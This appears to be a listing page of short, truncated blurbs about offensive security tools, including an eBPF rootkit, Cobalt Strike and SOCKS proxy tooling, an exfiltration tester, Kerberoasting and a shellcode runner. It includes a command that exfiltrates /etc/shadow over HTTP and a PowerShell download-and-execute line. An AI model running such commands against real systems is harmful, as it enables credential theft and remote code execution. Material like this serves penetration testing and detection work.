TripleCross – A Linux eBPF Rootkit With A Backdoor, C2, Library Injection, Execution Hijacking, Persistence And Stealth Capabilities.

TripleCross is a Linux eBPF rootkit that demonstrates the offensive capabilities of the eBPF technology. TripleCross is inspired by previous implant designs in this area, notably the works of Jeff Dileo at DEFCON 27 [1], Pat Hogan at DEFCON 29 [2], Guillaume Fournier and Sylvain Afchain also at DEFCON 29 [3], and Kris Nóva's Boopkit [4]. We reuse and

Chisel-Strike – A .NET XOR Encrypted Cobalt Strike Aggressor Implementation For Chisel To Utilize Faster Proxy And Advanced Socks5 Capabilities

A .NET XOR-encrypted Cobalt Strike aggressor implementation for chisel to utilize faster proxy and advanced SOCKS5 capabilities. Why write this? In my experience I found SOCKS4/SOCKS4a proxies quite slow in comparison to their SOCKS5 counterparts, and most C2 frameworks lack a SOCKS5 implementation. There is a C# wrapper around the go

Exfilkit – Data Exfiltration Utility For Testing Detection Capabilities

Data exfiltration utility for testing detection capabilities.

Description
Data exfiltration utility used for testing detection capabilities of security products. Obviously for legal purposes only.

Exfiltration How-To
/etc/shadow -> HTTP GET requests

Server
# ./ -m exfilkit.methods.http.param_cipher.GETServer -lp 80 -o output.log

Client
$ ./ -m exfilkit.methods.http.param_cipher.GETClient -rh -rp 80 -i ./samples/shadow.txt -r /etc/shadow

-> HTTP

PowerProxy – PowerShell SOCKS Proxy With Reverse Proxy Capabilities

PowerShell SOCKS proxy with reverse proxy capabilities. PowerProxy is written with penetration testers in mind. Reverse proxy functionality is a priority, for traversing networks that block inbound connections. Reverse proxy connections are encrypted by default. Username/password authentication is supported for SOCKS5 connections.

Setup
Import the script:
iex (new-object net.webclient).downloadstring("")
# OR
Import-Module \
can

Ocr-Recon – Tool To Find A Particular String In A List Of URLs Using Tesseract’S OCR (Optical Character Recognition) Capabilities

This tool is useful to find a particular string in a list of URLs using Tesseract's OCR (Optical Character Recognition) capabilities.

Usage
Usage: python3 listwithURLs stringtosearch

Download Ocr-Recon

Abaddon – Make red team operations faster, more repeatable, stealthier, while including value-added tools and bringing numerous reporting capabilities

Red team operations involve miscellaneous skills, last several months and are politically sensitive; they require a lot of monitoring, consolidation and caution. Wavestone's red team operations management software, Abaddon, has been designed to make red team operations faster, more repeatable and stealthier, while including value-added tools and bringing numerous reporting capabilities. Because: There are tons of

VECTR – A Tool That Facilitates Tracking Of Your Red And Blue Team Testing Activities To Measure Detection And Prevention Capabilities Across Different Attack Scenarios

VECTR documentation can be found here:
VECTR Community Discord Channel:

VECTR is a tool that facilitates tracking of your red and blue team testing activities to measure detection and prevention capabilities across different attack scenarios. VECTR provides the ability to create assessment groups, which consist of a collection of Campaigns and supporting Test

On-The-Fly – Tool Which Gives Capabilities To Perform Pentesting Tests In Several Domains (IoT, ICS & IT)


targetedKerberoast – Kerberoast With ACL Abuse Capabilities

targetedKerberoast is a Python script that can, like many others (e.g., print "kerberoast" hashes for user accounts that have an SPN set. This tool brings the following additional feature: for each user without an SPN, it tries to set one (abuse of a write permission on the servicePrincipalName attribute), prints the "kerberoast" hash, and deletes

GoPurple – Yet Another Shellcode Runner Consists Of Different Techniques For Evaluating Detection Capabilities Of Endpoint Security Solutions

This project is a simple collection of various shellcode injection techniques, aiming to streamline the process of endpoint detection evaluation, besides challenging myself to get into the Golang world.

Installation
1 – Requires Go installed.
2 – Build the application from the project's directory: go build. Set GOOS=windows if the build system is not Windows.